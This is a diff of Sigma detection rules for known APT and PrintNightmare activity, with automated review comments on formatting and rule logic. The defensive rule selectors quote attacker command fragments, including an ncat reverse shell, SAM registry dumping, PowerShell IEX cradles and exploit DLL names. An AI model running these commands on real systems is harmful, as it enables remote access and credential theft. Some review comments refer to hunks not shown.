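Review bot: The two comments added in the second hunk are placed where they do not apply: `# Dropper` sits directly above the `process_creation` log-source block (`EventID: 4688` / `Channel: Security`), whereas the WINWORD-parent → `.tmp` dropper pattern is `selection1`, and `# Specific Pattern` is inserted between the `CommandLine|endswith` and `NewProcessName|endswith` fields of `selection2`, visually splitting one AND-ed selection. Move `# Dropper` to the line above `selection1:` and either put `# Specific Pattern` above `selection2:` or drop it, since it does not say what makes the pattern specific (the `\Temp\` parent path, from the context line that follows, is the distinguishing part).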
@@ -1,8 +1,7 @@ title: EvilNum APT Golden Chickens Deployment Via OCX Files id: 8acf3cfa-1e8c-4099-83de-a0c4038e18f0 status: test -description: Detects Golden Chickens deployment method as used by Evilnum and described - in ESET July 2020 report +description: Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report references: - https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/ - https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/ @@ -21,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - regsvr32 - /s - /i diff --git a/sigma/builtin/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml b/sigma/builtin/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml index db033917d..0d71c46b8 100644 --- a/sigma/builtin/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml +++ b/sigma/builtin/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml @@ -1,8 +1,7 @@ title: GALLIUM IOCs id: 440a56bf-7873-4439-940a-1c8a671073c2 status: test -description: Detects artifacts associated with GALLIUM cyber espionage group as reported - by Microsoft Threat Intelligence Center in the December 2019 report. +description: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report. references: - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ - https://github.com/Azure/Azure-Sentinel/blob/a02ce85c96f162de6f8cc06f07a53b6525f0ff7f/Solutions/Legacy%20IOC%20based%20Threat%20Protection/Analytic%20Rules/GalliumIOCs.yaml 
@@ -64,46 +63,46 @@ detection: - SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de - SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2 selection_hashes: - - sha256: - - 9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd - - 7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b - - 657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5 - - 2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29 - - 52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77 - - a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3 - - 5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022 - - 6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883 - - 3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e - - 1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7 - - fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1 - - 7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c - - 178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945 - - 51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9 - - 889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79 - - 332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf - - 44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08 - - 63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef - - 056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070 - - sha1: - - 53a44c2396d15c3a03723fa5e5db54cafd527635 - - 9c5e496921e3bc882dc40694f1dcc3746a75db19 - - aeb573accfd95758550cf30bf04f389a92922844 - - 79ef78a797403a4ed1a616c68e07fff868a8650a - - 4f6f38b4cec35e895d91c052b1f5a83d665c2196 - - 1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d - - e841a63e47361a572db9a7334af459ddca11347a - - c28f606df28a9bc8df75a4d5e5837fc5522dd34d - - 2e94b305d6812a9f96e6781c888e48c7fb157b6b - - dd44133716b8a241957b912fa6a02efde3ce3025 - - 8793bf166cb89eb55f0593404e4e933ab605e803 - - 
a39b57032dbb2335499a51e13470a7cd5d86b138 - - 41cc2b15c662bc001c0eb92f6cc222934f0beeea - - d209430d6af54792371174e70e27dd11d3def7a7 - - 1c6452026c56efd2c94cea7e0f671eb55515edb0 - - c6b41d3afdcdcaf9f442bbe772f5da871801fd5a - - 4923d460e22fbbf165bbbaba168e5a46b8157d9f - - f201504bd96e81d0d350c3a8332593ee1c9e09de - - ddd2db1127632a2a52943a2fe516a2e7d05d70d2 + - sha256: + - 9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd + - 7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b + - 657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5 + - 2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29 + - 52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77 + - a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3 + - 5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022 + - 6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883 + - 3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e + - 1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7 + - fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1 + - 7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c + - 178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945 + - 51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9 + - 889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79 + - 332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf + - 44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08 + - 63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef + - 056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070 + - sha1: + - 53a44c2396d15c3a03723fa5e5db54cafd527635 + - 9c5e496921e3bc882dc40694f1dcc3746a75db19 + - aeb573accfd95758550cf30bf04f389a92922844 + - 79ef78a797403a4ed1a616c68e07fff868a8650a + - 4f6f38b4cec35e895d91c052b1f5a83d665c2196 + - 1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d + - 
e841a63e47361a572db9a7334af459ddca11347a + - c28f606df28a9bc8df75a4d5e5837fc5522dd34d + - 2e94b305d6812a9f96e6781c888e48c7fb157b6b + - dd44133716b8a241957b912fa6a02efde3ce3025 + - 8793bf166cb89eb55f0593404e4e933ab605e803 + - a39b57032dbb2335499a51e13470a7cd5d86b138 + - 41cc2b15c662bc001c0eb92f6cc222934f0beeea + - d209430d6af54792371174e70e27dd11d3def7a7 + - 1c6452026c56efd2c94cea7e0f671eb55515edb0 + - c6b41d3afdcdcaf9f442bbe772f5da871801fd5a + - 4923d460e22fbbf165bbbaba168e5a46b8157d9f + - f201504bd96e81d0d350c3a8332593ee1c9e09de + - ddd2db1127632a2a52943a2fe516a2e7d05d70d2 condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2020/TA/GALLIUM/win_dns_analytic_apt_gallium.yml b/sigma/builtin/emerging-threats/2020/TA/GALLIUM/win_dns_analytic_apt_gallium.yml index 7e3c939fe..3d9a4471d 100644 --- a/sigma/builtin/emerging-threats/2020/TA/GALLIUM/win_dns_analytic_apt_gallium.yml +++ b/sigma/builtin/emerging-threats/2020/TA/GALLIUM/win_dns_analytic_apt_gallium.yml @@ -1,11 +1,10 @@ title: GALLIUM Artefacts - Builtin id: 3db10f25-2527-4b79-8d4b-471eb900ee29 related: - - id: 440a56bf-7873-4439-940a-1c8a671073c2 - type: derived + - id: 440a56bf-7873-4439-940a-1c8a671073c2 + type: derived status: test -description: Detects artefacts associated with activity group GALLIUM - Microsoft - Threat Intelligence Center indicators released in December 2019. +description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. references: - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11) 
@@ -20,8 +19,7 @@ tags:
logsource:
product: windows
service: dns-server-analytic
- definition: 'Requirements: Microsoft-Windows-DNS-Server/Analytical ({EB79061A-A566-4698-9119-3ED2807060E7})
- Event Log must be collected in order to receive the events.'
+ definition: 'Requirements: Microsoft-Windows-DNS-Server/Analytical ({EB79061A-A566-4698-9119-3ED2807060E7}) Event Log must be collected in order to receive the events.'
detection:
dns_server_analytic:
Channel: Microsoft-Windows-DNS-Server/Analytical
diff --git a/sigma/builtin/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml b/sigma/builtin/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml
index fef46793a..0c0730e8d 100644
--- a/sigma/builtin/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml
+++ b/sigma/builtin/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml
@@ -1,8 +1,7 @@
title: Greenbug Espionage Group Indicators
id: 3711eee4-a808-4849-8a14-faf733da3612
status: test
-description: Detects tools and process executions used by Greenbug in their May 2020
- campaign as reported by Symantec
+description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
references:
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia
author: Florian Roth (Nextron Systems)
@@ -25,23 +24,23 @@ detection:
EventID: 4688
Channel: Security
selection_img:
- NewProcessName|endswith:
+ NewProcessName|endswith:
- :\ProgramData\adobe\Adobe.exe
- :\ProgramData\oracle\local.exe
- \revshell.exe
- \infopagesbackup\ncat.exe
- :\ProgramData\comms\comms.exe
selection_msf:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- -ExecutionPolicy Bypass -File
- \msf.ps1
selection_ncat:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- infopagesbackup
- \ncat
- -e cmd.exe
selection_powershell:
- CommandLine|contains:
+ CommandLine|contains:
- system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill
- -nop -w hidden -c $k=new-object
- '[Net.CredentialCache]::DefaultCredentials;IEX '
@@ -49,7 +48,7 @@ detection:
- -noninteractive -executionpolicy bypass whoami
- -noninteractive -executionpolicy bypass netstat -a
selection_other:
- CommandLine|contains: L3NlcnZlcj1
+ CommandLine|contains: L3NlcnZlcj1 # base64 encoded '/server='
condition: process_creation and (1 of selection_*)
falsepositives:
- Unlikely
diff --git a/sigma/builtin/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml b/sigma/builtin/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml
index 0a8e7b55d..8682aeb67 100644
--- a/sigma/builtin/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml
+++ b/sigma/builtin/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml
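Review bot: The new comment on `selection_other` presents `L3NlcnZlcj1` as "base64 encoded '/server='", but that string is only the encoding when `/server=` starts at a 3-byte boundary of the encoded input (and it also pins the next character's high bits); the same substring shifted by one or two bytes produces different base64 text and is missed by this `contains`. If the backend supports it, the Sigma `base64offset` modifier covers all three alignments in one line: `CommandLine|base64offset|contains: '/server='`. Otherwise the comment should at least say what it covers, e.g. `# base64 of '/server=' at offset 0 only; other alignments encode differently`. The `detection` section this hunk belongs to begins above the hunk.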
@@ -1,11 +1,10 @@
title: Lazarus Group Activity
id: 24c4d154-05a4-4b99-b57d-9b977472443a
related:
- - id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e
- type: obsoletes
+ - id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e
+ type: obsoletes
status: test
-description: Detects different process execution behaviors as described in various
- threat reports on Lazarus group activity
+description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity
references:
- https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/
- https://www.hvs-consulting.de/lazarus-report/
@@ -25,32 +24,33 @@ detection:
EventID: 4688
Channel: Security
selection_generic:
- CommandLine|contains:
+ CommandLine|contains:
- reg.exe save hklm\sam %temp%\~reg_sam.save
- 1q2w3e4r@#$@#$@#$
- ' -hp1q2w3e4 '
- '.dat data03 10000 -p '
selection_netstat:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- 'netstat -aon | find '
- ESTA
- ' > %temp%\~'
+ # Network share discovery
selection_network_discovery:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- .255 10 C:\ProgramData\IBM\
- .DAT
selection_persistence:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- ' /c '
- ' -p 0x'
- CommandLine|contains:
+ CommandLine|contains:
- C:\ProgramData\
- C:\RECYCLER\
selection_rundll32:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- 'rundll32 '
- C:\ProgramData\
- CommandLine|contains:
+ CommandLine|contains:
- .bin,
- .tmp,
- .dat,
diff --git a/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml b/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml
index cb55770e5..460e604ce 100644
--- a/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml
+++ b/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml
@@ -1,8 +1,7 @@
title: UNC2452 Process Creation Patterns
id: 9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f
status: test
-description: Detects a specific process creation patterns as seen used by UNC2452
- and provided by Microsoft as Microsoft Defender ATP queries
+description: Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries
references:
- https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/
author: Florian Roth (Nextron Systems)
@@ -12,32 +11,35 @@ tags:
- attack.execution
- attack.t1059.001
- detection.emerging_threats
+ # - sunburst
+ # - unc2452
logsource:
category: process_creation
product: windows
detection:
+ # To avoid writing complex condition. "selection_generic_1" and "selection_generic_2" are the same except for the extension used.
process_creation:
EventID: 4688
Channel: Security
selection_generic_1:
- CommandLine|contains:
+ CommandLine|contains:
- 7z.exe a -v500m -mx9 -r0 -p
- 7z.exe a -mx9 -r0 -p
- CommandLine|contains|all:
+ CommandLine|contains|all:
- .zip
- .txt
selection_generic_2:
- CommandLine|contains:
+ CommandLine|contains:
- 7z.exe a -v500m -mx9 -r0 -p
- 7z.exe a -mx9 -r0 -p
- CommandLine|contains|all:
+ CommandLine|contains|all:
- .zip
- .log
selection_generic_3:
ParentCommandLine|contains|all:
- wscript.exe
- .vbs
- CommandLine|contains|all:
+ CommandLine|contains|all:
- rundll32.exe
- C:\Windows
- .dll,Tk_
@@ -45,12 +47,12 @@ detection:
ParentCommandLine|contains:
- C:\Windows
- .dll
- CommandLine|contains: 'cmd.exe /C '
+ CommandLine|contains: 'cmd.exe /C '
ParentProcessName|endswith: \rundll32.exe
selection_generic_5:
- CommandLine: ''
+ CommandLine: ''
ParentProcessName|endswith: \rundll32.exe
- NewProcessName|endswith: \dllhost.exe
+ NewProcessName|endswith: \dllhost.exe
condition: process_creation and (1 of selection_generic_*)
falsepositives:
- Unknown
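Review bot: `selection_generic_5` keys on `CommandLine: ''`, and on Security 4688 an empty command line is also what every process looks like when the "Include command line in process creation events" audit setting is off, so on such hosts this selection would fire for every dllhost.exe spawned by rundll32.exe rather than only the argument-less one it is after. The new `# To avoid writing complex condition ...` comment is the natural place to record that prerequisite, e.g. `# selection_generic_5 needs command-line auditing enabled; with it off, CommandLine is empty for all 4688 events`. The same caveat belongs under `falsepositives:` in place of the current `- Unknown`.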
diff --git a/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml b/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml
index 05cd9b7f4..08ee32a67 100644
--- a/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml
+++ b/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml
@@ -1,8 +1,7 @@
title: UNC2452 PowerShell Pattern
id: b7155193-8a81-4d8f-805d-88de864ca50c
status: test
-description: Detects a specific PowerShell command line pattern used by the UNC2452
- actors as mentioned in Microsoft and Symantec reports
+description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
references:
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware
- https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/
@@ -15,6 +14,7 @@ tags:
- attack.t1059.001
- attack.t1047
- detection.emerging_threats
+ # - sunburst
logsource:
category: process_creation
product: windows
@@ -23,11 +23,11 @@ detection:
EventID: 4688
Channel: Security
selection_cli_1:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- Invoke-WMIMethod win32_process -name create -argumentlist
- rundll32 c:\windows
selection_cli_2:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- 'wmic /node:'
- process call create "rundll32 c:\windows
condition: process_creation and (1 of selection_*)
diff --git a/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml b/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml
index 6052eca6b..4c88c59f0 100644
--- a/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml
+++ b/sigma/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml
@@ -19,14 +19,14 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- Execute
- CreateObject
- RegRead
- window.close
- \Microsoft\Windows\CurrentVersion
filter:
- CommandLine|contains: \Software\Microsoft\Windows\CurrentVersion\Run
+ CommandLine|contains: \Software\Microsoft\Windows\CurrentVersion\Run
condition: process_creation and (selection and not filter)
falsepositives:
- Unknown
diff --git a/sigma/builtin/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml b/sigma/builtin/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml
index 82499d81f..16b628b3d 100644
--- a/sigma/builtin/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml
+++ b/sigma/builtin/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml
@@ -1,8 +1,7 @@
title: TAIDOOR RAT DLL Load
id: d1aa3382-abab-446f-96ea-4de52908210b
status: test
-description: Detects specific process characteristics of Chinese TAIDOOR RAT malware
- load
+description: Detects specific process characteristics of Chinese TAIDOOR RAT malware load
references:
- https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a
author: Florian Roth (Nextron Systems)
@@ -20,13 +19,13 @@ detection:
EventID: 4688
Channel: Security
selection1:
- CommandLine|contains:
+ CommandLine|contains:
- dll,MyStart
- dll MyStart
selection2a:
- CommandLine|endswith: ' MyStart'
+ CommandLine|endswith: ' MyStart'
selection2b:
- CommandLine|contains: rundll32.exe
+ CommandLine|contains: rundll32.exe
condition: process_creation and (selection1 or ( selection2a and selection2b ))
falsepositives:
- Unknown
diff --git a/sigma/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml b/sigma/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml
index cf725b029..6b0ce0a17 100644
--- a/sigma/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml
+++ b/sigma/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml
@@ -1,8 +1,7 @@
title: Winnti Malware HK University Campaign
id: 3121461b-5aa0-4a41-b910-66d25524edbb
status: test
-description: Detects specific process characteristics of Winnti malware noticed in
- Dec/Jan 2020 in a campaign against Honk Kong universities
+description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities
references:
- https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/
author: Florian Roth (Nextron Systems), Markus Neis
@@ -24,18 +23,18 @@ detection:
ParentProcessName|contains:
- C:\Windows\Temp
- \hpqhvind.exe
- NewProcessName|startswith: C:\ProgramData\DRM
+ NewProcessName|startswith: C:\ProgramData\DRM
selection2:
ParentProcessName|startswith: C:\ProgramData\DRM
- NewProcessName|endswith: \wmplayer.exe
+ NewProcessName|endswith: \wmplayer.exe
selection3:
ParentProcessName|endswith: \Test.exe
- NewProcessName|endswith: \wmplayer.exe
+ NewProcessName|endswith: \wmplayer.exe
selection4:
- NewProcessName: C:\ProgramData\DRM\CLR\CLR.exe
+ NewProcessName: C:\ProgramData\DRM\CLR\CLR.exe
selection5:
ParentProcessName|startswith: C:\ProgramData\DRM\Windows
- NewProcessName|endswith: \SearchFilterHost.exe
+ NewProcessName|endswith: \SearchFilterHost.exe
condition: process_creation and (1 of selection*)
falsepositives:
- Unlikely
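Review bot: The rewritten `description:` line still carries the typo `Honk Kong`; since this commit already rewrites that exact line, it is the moment to make it `... in a campaign against Hong Kong universities` (the welivesecurity reference URL in the same hunk confirms the spelling). The detection hunk below it only re-indents existing selectors and raises nothing further.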
diff --git a/sigma/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml b/sigma/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml
index f875df92a..79e0e4db9 100644
--- a/sigma/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml
+++ b/sigma/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml
@@ -1,8 +1,7 @@
title: Winnti Pipemon Characteristics
id: 73d70463-75c9-4258-92c6-17500fe972f2
status: stable
-description: Detects specific process characteristics of Winnti Pipemon malware reported
- by ESET
+description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET
references:
- https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/
author: Florian Roth (Nextron Systems), oscd.community
@@ -21,10 +20,10 @@ detection:
EventID: 4688
Channel: Security
selection_1:
- CommandLine|contains: setup0.exe -p
+ CommandLine|contains: setup0.exe -p
selection_2:
- CommandLine|contains: setup.exe
- CommandLine|endswith:
+ CommandLine|contains: setup.exe
+ CommandLine|endswith:
- -x:0
- -x:1
- -x:2
diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/av_printernightmare_cve_2021_34527.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/av_printernightmare_cve_2021_34527.yml
index 10cfe04d5..4b2d5c861 100644
--- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/av_printernightmare_cve_2021_34527.yml
+++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/av_printernightmare_cve_2021_34527.yml
@@ -1,9 +1,7 @@
title: Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection
id: 6fe1719e-ecdf-4caf-bffe-4f501cb0a561
status: stable
-description: Detects the suspicious file that is created from PoC code against Windows
- Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare),
- CVE-2021-1675 .
+description: Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .
references:
- https://twitter.com/mvelazco/status/1410291741241102338
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675
@@ -20,7 +18,7 @@ logsource:
service: windefend
detection:
antivirus:
- EventID:
+ EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path'
- 1006
- 1007
- 1008
@@ -39,7 +37,7 @@ detection:
selection:
Path|contains: :\Windows\System32\spool\drivers\x64\
keywords:
- - File submitted to Symantec
+ - File submitted to Symantec # symantec fp, pending analysis, more generic
condition: antivirus and (selection and not keywords)
falsepositives:
- Unlikely, or pending PSP analysis
diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler.yml
index 06c0b2029..c2eef25e8 100644
--- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler.yml
+++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler.yml
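Review bot: `selection` only matches `Path|contains: :\Windows\System32\spool\drivers\x64\`, so a PoC driver dropped on a 32-bit or ARM64 host lands in a sibling spool directory and never reaches this rule, and the new `# symantec fp, pending analysis` comment on the exclusion does not mention that scope. Unless the rule is meant to be x64-only, I would turn the value into a list: `- :\Windows\System32\spool\drivers\x64\`, `- :\Windows\System32\spool\drivers\W32X86\`, `- :\Windows\System32\spool\drivers\ARM64\` (the non-x64 directory names are from memory and should be checked on a real host). The `antivirus` EventID list this condition references is completed in the preceding hunk.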
@@ -1,8 +1,7 @@
title: Possible CVE-2021-1675 Print Spooler Exploitation
id: 4e64668a-4da1-49f5-a8df-9e2d5b866718
status: test
-description: Detects events of driver load errors in print service logs that could
- be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675
+description: Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675
references:
- https://github.com/hhlxf/PrintNightmare
- https://github.com/afwu/PrintNightmare
@@ -28,6 +27,7 @@ detection:
- '0x7e'
keywords:
- The print spooler failed to load a plug-in module
+ # default file names used in PoC codes
- MyExploit.dll
- evil.dll
- \addCube.dll
@@ -37,7 +37,7 @@ detection:
- \mimilib.dll
- \mimispool.dll
falsepositive:
- - ' registration timed out'
+ - ' registration timed out' # ex: The print spooler failed to load a plug-in module PrintConfig registration timed out
condition: printservice_admin and ((selection or keywords) and not falsepositive)
fields:
- PluginDllName
diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler_operational.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler_operational.yml
index 89d83201f..caf656ee0 100644
--- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler_operational.yml
+++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler_operational.yml
@@ -1,8 +1,7 @@
title: CVE-2021-1675 Print Spooler Exploitation
id: f34d942d-c8c4-4f1f-b196-22471aecf10a
status: test
-description: Detects driver load events print service operational log that are a sign
- of successful exploitation attempts against print spooler vulnerability CVE-2021-1675
+description: Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675
references:
- https://twitter.com/MalwareJake/status/1410421967463731200
author: Florian Roth (Nextron Systems)
diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_security_exploit_cve_2021_1675_printspooler_security.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_security_exploit_cve_2021_1675_printspooler_security.yml
index b89dd78f0..4b2792344 100644
--- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_security_exploit_cve_2021_1675_printspooler_security.yml
+++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_security_exploit_cve_2021_1675_printspooler_security.yml
@@ -1,9 +1,7 @@
title: CVE-2021-1675 Print Spooler Exploitation IPC Access
id: 8fe1c584-ee61-444b-be21-e9054b229694
status: test
-description: Detects remote printer driver load from Detailed File Share in Security
- logs that are a sign of successful exploitation attempts against print spooler
- vulnerability CVE-2021-1675 and CVE-2021-34527
+description: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527
references:
- https://twitter.com/INIT_3/status/1410662463641731075
author: INIT_6
